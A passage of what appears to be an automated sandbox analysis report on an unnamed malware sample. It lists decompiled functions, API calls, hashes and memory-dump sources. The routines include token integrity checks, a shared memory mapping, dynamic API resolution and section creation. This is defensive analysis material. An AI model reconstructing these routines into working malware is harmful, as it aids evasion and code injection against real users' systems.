						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

0x02eaac64
0x02eaac7a
0x02eaac80
0x02eaac82
0x02eaac87
0x02eaac8d
0x02eaac92
0x02eaac95
0x02eaaca3
0x02eaacaa
0x02eaacad
0x02eaacb0
0x02eaacb1
0x02eaacb4
0x02eaacb7
0x02eaacba
0x02eaacbf
0x02eaacce
0x00000000
0x02eaacd4
0x02eaacde
0x02eaace8
0x02eaaced
0x02eaacef
0x02eaacf9
0x02eaacfc
0x02eaacff
0x02eaad05
0x02eaad07
0x02eaad07
0x02eaad0a
0x02eaad0d
0x02eaad12
0x02eaad16
0x02eaad29
0x02eaad2b
0x02eaadd3
0x02eaadd3
0x02eaadda
0x02eaaddd
0x02eaade7
0x02eaade7
0x02eaadeb
0x02eaae69
0x02eaae6c
0x02eaae6e
0x02eaae6e
0x02eaae75
0x02eaae77
0x02eaae81
0x02eaae84
0x02eaae87
0x02eaae87
0x00000000
0x02eaaded
0x02eaadf0
0x02eaae1e
0x02eaae28
0x02eaae2c
0x02eaae34
0x02eaae37
0x02eaae3e
0x02eaae48
0x02eaae48
0x02eaae4c
0x02eaae51
0x02eaae60
0x02eaae66
0x02eaae66
0x02eaae4c
0x00000000
0x02eaadf7
0x02eaadfa
0x02eaae02
0x02eaae17
0x02eaae1c
0x00000000
0x00000000
0x02eaae1c
0x00000000
0x02eaae02
0x02eaadf0
0x02eaadeb
0x02eaad31
0x02eaad38
0x02eaad48
0x02eaad4b
0x02eaad51
0x02eaad55
0x02eaad98
0x02eaada4
0x02eaadcd
0x02eaada6
0x02eaadaa
0x02eaadb0
0x02eaadb8
0x02eaadba
0x02eaadbd
0x02eaadc3
0x02eaadc5
0x02eaadc5
0x02eaadb8
0x02eaadaa
0x00000000
0x02eaada4
0x02eaad5d
0x02eaad60
0x02eaad67
0x02eaad77
0x02eaad7a
0x02eaad8a
0x00000000
0x02eaad90
0x02eaad71
0x02eaad75
0x00000000
0x00000000
0x00000000
0x02eaad75
0x02eaad42
0x02eaad46
0x00000000
0x00000000
0x00000000
0x02eaad46
0x02eaad1f
0x02eaad23
0x00000000
0x00000000
0x00000000

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 02EAACCE
LoadLibraryA.KERNELBASE(?), ref: 02EAAD4B
GetLastError.KERNEL32 ref: 02EAAD57
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 02EAAD8A

Strings

$, xrefs: 02EAACA3

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: $
API String ID: 948315288-3993045852
Opcode ID: 7abbca89b999cadb16eac92bc24277fedeaa8ad0000e1e1745accf764033a85d
Instruction ID: 28b563033b29f56223429728b926be3c9b5cad2526860da31f0b9a7d21e3e446
Opcode Fuzzy Hash: 7abbca89b999cadb16eac92bc24277fedeaa8ad0000e1e1745accf764033a85d
Instruction Fuzzy Hash: 5B813A71A803059FDB20CF99D891BAEB7F5AF48309F559429E545EB340EB70F984CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02EA51B0, Relevance: 16.6, APIs: 11, Instructions: 150
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E02EA51B0(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x2ead240);
					_v20 = 0;
					_v16 = 0;
					L02EAAF2E();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x2ead26c; // 0x204
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x2ead24c = 5;
						} else {
							_t68 = E02EA8D14(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x2ead260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E02EAA376(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E02EA36B1(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x2ead244);
							goto L21;
						} else {
							__eflags =  *0x2ead248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E02EA6761();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x2ead248);
								L21:
								L02EAAF2E();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x2ead238, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x02ea51b0
0x02ea51c2
0x02ea51c5
0x02ea51d1
0x02ea51d7
0x02ea51dc
0x02ea5343
0x02ea51e2
0x02ea51e2
0x02ea51e4
0x02ea51e9
0x02ea51ea
0x02ea51f0
0x02ea51f3
0x02ea51f6
0x02ea5204
0x02ea520f
0x02ea5212
0x02ea5214
0x02ea5221
0x02ea522b
0x02ea522d
0x02ea5232
0x02ea5237
0x02ea5242
0x02ea5242
0x02ea5239
0x02ea5239
0x02ea5240
0x00000000
0x00000000
0x02ea5240
0x02ea524c
0x00000000
0x02ea524f
0x02ea5253
0x02ea525e
0x02ea525e
0x02ea5265
0x02ea526e
0x02ea5275
0x02ea527e
0x02ea5281
0x02ea5284
0x02ea5289
0x02ea528e
0x00000000
0x00000000
0x02ea5290
0x02ea5293
0x02ea5296
0x02ea5299
0x00000000
0x02ea529b
0x02ea52aa
0x02ea52aa
0x00000000
0x02ea52d8
0x02ea52d8
0x02ea52dd
0x02ea52fc
0x02ea52fe
0x02ea5303
0x02ea5304
0x00000000
0x02ea52df
0x02ea52df
0x02ea52e5
0x00000000
0x02ea52e7
0x02ea52e7
0x02ea52ec
0x02ea52ee
0x02ea52f3
0x02ea52f4
0x02ea530a
0x02ea530a
0x02ea5312
0x02ea531d
0x02ea5320
0x02ea532b
0x02ea532d
0x02ea5330
0x02ea5332
0x00000000
0x02ea5338
0x00000000
0x02ea5338
0x02ea5332
0x02ea52e5
0x00000000
0x02ea52dd
0x02ea52ad
0x02ea52af
0x02ea52b2
0x02ea52b3
0x02ea52b3
0x02ea52b7
0x02ea52c1
0x02ea52c1
0x02ea52c7
0x02ea52ca
0x02ea52ca
0x02ea52d0
0x02ea52d0
0x02ea534d
0x00000000

APIs

memset.NTDLL ref: 02EA51C5
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 02EA51D1
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 02EA51F6
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 02EA5212
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02EA522B
HeapFree.KERNEL32(00000000,00000000), ref: 02EA52C1
CloseHandle.KERNEL32(?), ref: 02EA52D0
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 02EA530A
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,02EA5D5E,?), ref: 02EA5320
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02EA532B

Part of subcall function 02EA8D14: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,039C9368,00000000,?,74B5F710,00000000,74B5F730), ref: 02EA8D63
Part of subcall function 02EA8D14: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,039C93A0,?,00000000,30314549,00000014,004F0053,039C935C), ref: 02EA8E00
Part of subcall function 02EA8D14: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02EA523E), ref: 02EA8E12

GetLastError.KERNEL32 ref: 02EA533D

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: b5079d40c0d34aab89e325caac326976c5723ea73c907968256138c8014e8b4f
Instruction ID: 2f771c918798124b5fe19c1e318ac421c405d29d73debf3d8bc1af5f352c9a99
Opcode Fuzzy Hash: b5079d40c0d34aab89e325caac326976c5723ea73c907968256138c8014e8b4f
Instruction Fuzzy Hash: 23519E71C81228EBCF11DF95DC849EEBFB9EF49724F609616F414A6244D730A694CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A1456, Relevance: 15.1, APIs: 10, Instructions: 98
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E6E1A1456(char _a4) {
				long _v8;
				struct _SYSTEMTIME _v24;
				char _v48;
				void* __edi;
				long _t20;
				int _t22;
				long _t25;
				long _t26;
				long _t30;
				void* _t36;
				intOrPtr _t38;
				intOrPtr _t43;
				signed int _t44;
				void* _t48;
				signed int _t51;
				void* _t54;
				intOrPtr* _t55;

				_t20 = E6E1A1F0E();
				_v8 = _t20;
				if(_t20 != 0) {
					return _t20;
				}
				do {
					GetSystemTime( &_v24);
					_t22 = SwitchToThread();
					asm("cdq");
					_t44 = 9;
					_t51 = _t22 + (_v24.wMilliseconds & 0x0000ffff) % _t44;
					_t25 = E6E1A1717(0, _t51); // executed
					_v8 = _t25;
					Sleep(_t51 << 5); // executed
					_t26 = _v8;
				} while (_t26 == 0xc);
				if(_t26 != 0) {
					L18:
					return _t26;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t54 = E6E1A155C(E6E1A1E55,  &_v48);
					if(_t54 == 0) {
						_v8 = GetLastError();
					} else {
						_t30 = WaitForSingleObject(_t54, 0xffffffff);
						_v8 = _t30;
						if(_t30 == 0) {
							GetExitCodeThread(_t54,  &_v8);
						}
						CloseHandle(_t54);
					}
					_t26 = _v8;
					if(_t26 == 0xffffffff) {
						_t26 = GetLastError();
					}
					goto L18;
				}
				if(E6E1A1F87(_t44,  &_a4) != 0) {
					 *0x6e1a4138 = 0;
					goto L11;
				}
				_t43 = _a4;
				_t55 = __imp__GetLongPathNameW;
				_t36 =  *_t55(_t43, 0, 0); // executed
				_t48 = _t36;
				if(_t48 == 0) {
					L9:
					 *0x6e1a4138 = _t43;
					goto L11;
				}
				_t14 = _t48 + 2; // 0x2
				_t38 = E6E1A2009(_t48 + _t14);
				 *0x6e1a4138 = _t38;
				if(_t38 == 0) {
					goto L9;
				}
				 *_t55(_t43, _t38, _t48); // executed
				E6E1A201E(_t43);
				goto L11;
			}

0x6e1a145d
0x6e1a1464
0x6e1a1469
0x6e1a1559
0x6e1a1559
0x6e1a1470
0x6e1a1474
0x6e1a147a
0x6e1a1488
0x6e1a1489
0x6e1a148c
0x6e1a148f
0x6e1a1498
0x6e1a149b
0x6e1a14a1
0x6e1a14a4
0x6e1a14ab
0x6e1a1556
0x00000000
0x6e1a1556
0x6e1a14b5
0x6e1a1506
0x6e1a1506
0x6e1a151c
0x6e1a1521
0x6e1a1549
0x6e1a1523
0x6e1a1526
0x6e1a152c
0x6e1a1531
0x6e1a1538
0x6e1a1538
0x6e1a153f
0x6e1a153f
0x6e1a154c
0x6e1a1552
0x6e1a1554
0x6e1a1554
0x00000000
0x6e1a1552
0x6e1a14c2
0x6e1a1500
0x00000000
0x6e1a1500
0x6e1a14c4
0x6e1a14c7
0x6e1a14d0
0x6e1a14d2
0x6e1a14d6
0x6e1a14f8
0x6e1a14f8
0x00000000
0x6e1a14f8
0x6e1a14d8
0x6e1a14dd
0x6e1a14e2
0x6e1a14e9
0x00000000
0x00000000
0x6e1a14ee
0x6e1a14f1
0x00000000

APIs

Part of subcall function 6E1A1F0E: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E1A1462,74B063F0), ref: 6E1A1F1D
Part of subcall function 6E1A1F0E: GetVersion.KERNEL32 ref: 6E1A1F2C
Part of subcall function 6E1A1F0E: GetCurrentProcessId.KERNEL32 ref: 6E1A1F48
Part of subcall function 6E1A1F0E: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E1A1F61

GetSystemTime.KERNEL32(?,00000000,74B063F0), ref: 6E1A1474
SwitchToThread.KERNEL32 ref: 6E1A147A

Part of subcall function 6E1A1717: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6E1A176D
Part of subcall function 6E1A1717: memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6E1A1833

Sleep.KERNELBASE(00000000,00000000), ref: 6E1A149B
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E1A14D0
GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E1A14EE
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 6E1A1526
GetExitCodeThread.KERNEL32(00000000,?), ref: 6E1A1538
CloseHandle.KERNEL32(00000000), ref: 6E1A153F
GetLastError.KERNEL32(?,00000000), ref: 6E1A1547
GetLastError.KERNEL32 ref: 6E1A1554

Memory Dump Source

Source File: 00000002.00000002.482973079.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.482953775.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.483022155.000000006E1A3000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.483068232.000000006E1A5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.483115438.000000006E1A6000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastLongNamePathProcessThread$AllocCloseCodeCreateCurrentEventExitHandleObjectOpenSingleSleepSwitchSystemTimeVersionVirtualWaitmemcpy
String ID:
API String ID: 1962885430-0
Opcode ID: 66f9c3e04ab51c453ce9194ef1d8e75bab1d924ad59eedd5b42cf3d681d6ad15
Instruction ID: b278088b08704cab212bf7fc830d01630e7d1d67f990f74fa0fe9b98112c9346
Opcode Fuzzy Hash: 66f9c3e04ab51c453ce9194ef1d8e75bab1d924ad59eedd5b42cf3d681d6ad15
Instruction Fuzzy Hash: C63173F9A00615ABCB01EBFD89489BE76BCDF57360B214515EA11D3140EB34DA85FB60

Uniqueness

Uniqueness Score: -1.00%

Function 02EA232F, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E02EA232F(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L02EAAF28();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x2ead2a8; // 0xb1a5a8
				_t5 = _t13 + 0x2eae87e; // 0x39c8e26
				_t6 = _t13 + 0x2eae59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L02EAABCA();
				_t17 = CreateFileMappingW(0xffffffff, 0x2ead2ac, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x02ea232f
0x02ea2337
0x02ea233b
0x02ea2341
0x02ea2346
0x02ea234b
0x02ea234e
0x02ea2351
0x02ea2356
0x02ea2357
0x02ea235a
0x02ea235f
0x02ea2366
0x02ea2370
0x02ea2372
0x02ea2373
0x02ea2376
0x02ea2392
0x02ea2398
0x02ea239c
0x02ea23ea
0x02ea239e
0x02ea23ab
0x02ea23bb
0x02ea23c3
0x02ea23d5
0x02ea23d9
0x00000000
0x00000000
0x02ea23c5
0x02ea23c8
0x02ea23cd
0x02ea23cf
0x02ea23cf
0x02ea23ad
0x02ea23af
0x02ea23db
0x02ea23dc
0x02ea23dc
0x02ea23ab
0x02ea23f1

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,02EA5C31,?,?,4D283A53,?,?), ref: 02EA233B
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 02EA2351
_snwprintf.NTDLL ref: 02EA2376
CreateFileMappingW.KERNELBASE(000000FF,02EAD2AC,00000004,00000000,00001000,?), ref: 02EA2392
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02EA5C31,?,?,4D283A53), ref: 02EA23A4
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 02EA23BB
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,02EA5C31,?,?), ref: 02EA23DC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02EA5C31,?,?,4D283A53), ref: 02EA23E4

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: 70d096c269a505a629a03bd26f3a78590c66289d387917ea855d814d412794e0
Instruction ID: 8abf5a0c418d45c20cba6c7e17b47b77bb08f050e1830a9160f201fb7400ea17
Opcode Fuzzy Hash: 70d096c269a505a629a03bd26f3a78590c66289d387917ea855d814d412794e0
Instruction Fuzzy Hash: 1021D272AC0204BBD711AF65DC56F9E37AAAB49704F249521FA05FB290D770B948CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02EA1A08, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02EA1A08(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x2ead25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E02EAA71F(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E02EAA734(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x02ea1a15
0x02ea1a1c
0x02ea1a23
0x02ea1a37
0x02ea1a42
0x02ea1a5a
0x02ea1a67
0x02ea1a6a
0x02ea1a6f
0x02ea1a7a
0x02ea1a7e
0x02ea1a8d
0x02ea1a91
0x02ea1aad
0x02ea1aad
0x02ea1ab1
0x02ea1ab1
0x02ea1ab6
0x02ea1aba
0x02ea1ac0
0x02ea1ac1
0x02ea1ac8
0x02ea1ace

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 02EA1A3A
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 02EA1A5A
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 02EA1A6A
CloseHandle.KERNEL32(00000000), ref: 02EA1ABA

Part of subcall function 02EAA71F: RtlAllocateHeap.NTDLL(00000000,00000000,02EA5595), ref: 02EAA72B

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 02EA1A8D
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 02EA1A95
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 02EA1AA5

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 262ac6d87143dea0145f3945e9deb9895299890a5ec683cabf4700023c133a89
Instruction ID: df121da023905ca1dc7c6add9384582b341ad67fd49a091b69874c6d2e3c7f51
Opcode Fuzzy Hash: 262ac6d87143dea0145f3945e9deb9895299890a5ec683cabf4700023c133a89
Instruction Fuzzy Hash: 9C214C75980248FFEF00DF91DC84EEEBBB9EB44304F104065F501AA250D7716A55DF60

Uniqueness

Uniqueness Score: -1.00%

Function 02EA391F, Relevance: 9.2, APIs: 6, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 02EA395A
IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 02EA39DD
StrStrIW.SHLWAPI(00000000,006E0069), ref: 02EA3A1D
SysFreeString.OLEAUT32(00000000), ref: 02EA3A3F

Part of subcall function 02EA6F3A: SysAllocString.OLEAUT32(02EAC290), ref: 02EA6F8A

SafeArrayDestroy.OLEAUT32(00000000), ref: 02EA3A92
SysFreeString.OLEAUT32(00000000), ref: 02EA3AA1

Part of subcall function 02EA1AE2: Sleep.KERNELBASE(000001F4), ref: 02EA1B2A

Memory Dump Source

Source File: 00000002.00000002.479405734.0000000002EA1000.00000020.00000001.sdmp, Offset: 02EA0000, based on PE: true

Associated: 00000002.00000002.479379747.0000000002EA0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479456411.0000000002EAC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.479484938.0000000002EAD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.479532107.0000000002EAF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
String ID:
API String ID: 2118684380-0
Opcode ID: bf65c700f66cb80d80009f17c8afccd424da3540382e5379d773917607c1dd65
Instruction ID: be66354faf278977d234558467d5e03bdb9b0ad2c6694b172505e9d038366f5b
Opcode Fuzzy Hash: bf65c700f66cb80d80009f17c8afccd424da3540382e5379d773917607c1dd65
Instruction Fuzzy Hash: B8515135940609AFDB01CFA9C894A9EB7B6FF88708F158869E515DF220EB31ED45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A1146, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1A1146(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6E1A2009(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6e1a4144 + 0x6e1a5014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6e1a4144 + 0x6e1a5151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6E1A201E(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6e1a4144 + 0x6e1a5161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6e1a4144 + 0x6e1a5174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6e1a4144 + 0x6e1a5189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6e1a4144 + 0x6e1a519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6E1A1996(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x6e1a1154
0x6e1a1158
0x6e1a1219
0x6e1a115e
0x6e1a1176
0x6e1a1185
0x6e1a118c
0x6e1a118e
0x6e1a1193
0x6e1a1211
0x6e1a1212
0x6e1a1195
0x6e1a11a2
0x6e1a11a4
0x6e1a11a9
0x00000000
0x6e1a11ab
0x6e1a11b8
0x6e1a11ba
0x6e1a11bf
0x00000000
0x6e1a11c1
0x6e1a11ce
0x6e1a11d0
0x6e1a11d5
0x00000000
0x6e1a11d7
0x6e1a11e4
0x6e1a11e6
0x6e1a11eb
0x00000000
0x6e1a11ed
0x6e1a11f3
0x6e1a11f9
0x6e1a11fe
0x6e1a1203
0x6e1a1208
0x00000000
0x6e1a120a
0x6e1a120d
0x6e1a120d
0x6e1a1208
0x6e1a11eb
0x6e1a11d5
0x6e1a11bf
0x6e1a11a9
0x6e1a1193
0x6e1a1227

APIs

Part of subcall function 6E1A2009: HeapAlloc.KERNEL32(00000000,?,6E1A1FA5,00000208,00000000,00000000,?,?,?,6E1A14C0,?), ref: 6E1A2015

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E1A1670,?,?,?,?,?,00000002,?,?), ref: 6E1A116A
GetProcAddress.KERNEL32(00000000,?), ref: 6E1A118C
GetProcAddress.KERNEL32(00000000,?), ref: 6E1A11A2
GetProcAddress.KERNEL32(00000000,?), ref: 6E1A11B8
GetProcAddress.KERNEL32(00000000,?), ref: 6E1A11CE
GetProcAddress.KERNEL32(00000000,?), ref: 6E1A11E4

Part of subcall function 6E1A1996: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,?), ref: 6E1A19F3
Part of subcall function 6E1A1996: memset.NTDLL ref: 6E1A1A15

Memory Dump Source

Source File: 00000002.00000002.482973079.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.482953775.000000006E1A0000.00000002.00020000.sdmp Download File
